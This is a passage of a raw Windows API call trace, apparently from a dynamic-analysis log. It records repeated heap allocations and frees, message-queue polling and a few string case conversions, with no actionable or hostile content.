returned 0x8dee70 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0165.373] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0165.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.374] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0165.374] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0165.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.375] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0165.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0165.375] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0165.376] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0165.376] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0165.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0165.376] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.377] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0165.378] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0165.378] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.379] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0165.379] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0165.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0165.380] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.380] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.381] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.382] HeapFree (in: 